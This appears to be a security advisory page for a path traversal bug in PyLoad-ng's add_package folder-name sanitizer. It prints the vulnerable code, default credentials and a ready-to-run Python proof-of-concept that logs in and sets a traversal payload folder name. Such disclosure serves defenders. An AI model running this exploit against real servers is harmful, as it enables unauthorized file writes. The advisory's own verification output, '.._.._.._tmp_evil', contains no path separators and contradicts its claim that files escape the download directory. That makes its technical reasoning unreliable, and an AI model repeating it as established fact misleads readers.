PyLoad-ng CVE-2026-42314
MEDIUM
GHSA-97r3-5w84-r4q8
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Lifecycle Timeline
2Blast Radius
ecosystem impact- 1 pypi packages depend on pyload-ng (1 direct, 0 indirect)
Ecosystem-wide dependent count for version 0.5.0b3.dev100.
DescriptionNVD
Insufficient sanitization of package folder names allows writing files outside the intended download directory.
Affected Component
src/pyload/core/api/__init__.py- Function:
add_package()
Description
Package folder names are sanitized using insufficient string replacement:
folder = (
folder.replace("http://", "")
.replace("https://", "")
.replace("../", "_")
# Bypassable!
.replace("..\\", "_")
.replace(":", "")
.replace("/", "_")
.replace("\\", "_")
)The ../ replacement is bypassable. The pattern ....// becomes .._ after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS.
Proof of Concept
Setup
pip install pyload-ng[all]
pyload -d &
# Default credentials: pyload / pyloadExploit
#!/usr/bin/env python3
import requests
BASE_URL = "http://localhost:8000"
USERNAME = "pyload"
PASSWORD = "pyload"
session = requests.Session()
# Login
session.post(f"{BASE_URL}/login", data={
"username": USERNAME,
"password": PASSWORD
})
# Create package with malicious folder name
# The pattern ....// bypasses the ../ replacement
# After sanitization: .._ (still contains ..)
folder_payload = "....//....//....//tmp/evil"
resp = session.post(f"{BASE_URL}/api/add_package", json={
"name": "test_package",
"links": ["http://example.com/file.txt"],
"dest": 1
# Destination.QUEUE
})
package_id = resp.json()
print(f"Created package: {package_id}")
# Set malicious folder name
resp = session.post(f"{BASE_URL}/api/set_package_data", json={
"package_id": package_id,
"data": {"folder": folder_payload}
})
print(f"Set folder payload: {folder_payload}")
print(f"Response: {resp.status_code}")
# When download occurs, files will be written outside download dir
print("[+] When a file is downloaded, it will be written to manipulated path")
print(" The sanitized folder still contains '..' sequences that OS resolves")Verification
Check where files would be written:
import os
download_dir = "/home/user/Downloads"
folder = "....//....//....//tmp/evil"
# Simulate pyLoad's sanitization
sanitized = folder.replace("../", "_").replace("/", "_")
print(f"After pyLoad sanitization: {sanitized}")
# Output: .._.._.._tmp_evil
# When pyLoad does os.path.join and then opens the file:
final_path = os.path.join(download_dir, sanitized)
print(f"Joined path: {final_path}")
# Output: /home/user/Downloads/.._.._.._tmp_evil
# The .. sequences remain and could be resolved by OS during file operationsImpact
Authenticated users with ADD permission can:
- Write files outside the download directory
- Potentially overwrite system files (depending on permissions)
- Clutter system directories with downloaded content
AnalysisAI
Path traversal in PyLoad-ng package folder name sanitization allows authenticated users with ADD permission to write files outside the intended download directory via insufficient string replacement logic. The sanitizer replaces ../ with _, but the pattern ....// bypasses this filter by becoming .._ after replacement, leaving exploitable .. …
Sign in for full analysis, threat intelligence, and remediation guidance.
Share
External POC / Exploit Code
Leaving vuln.today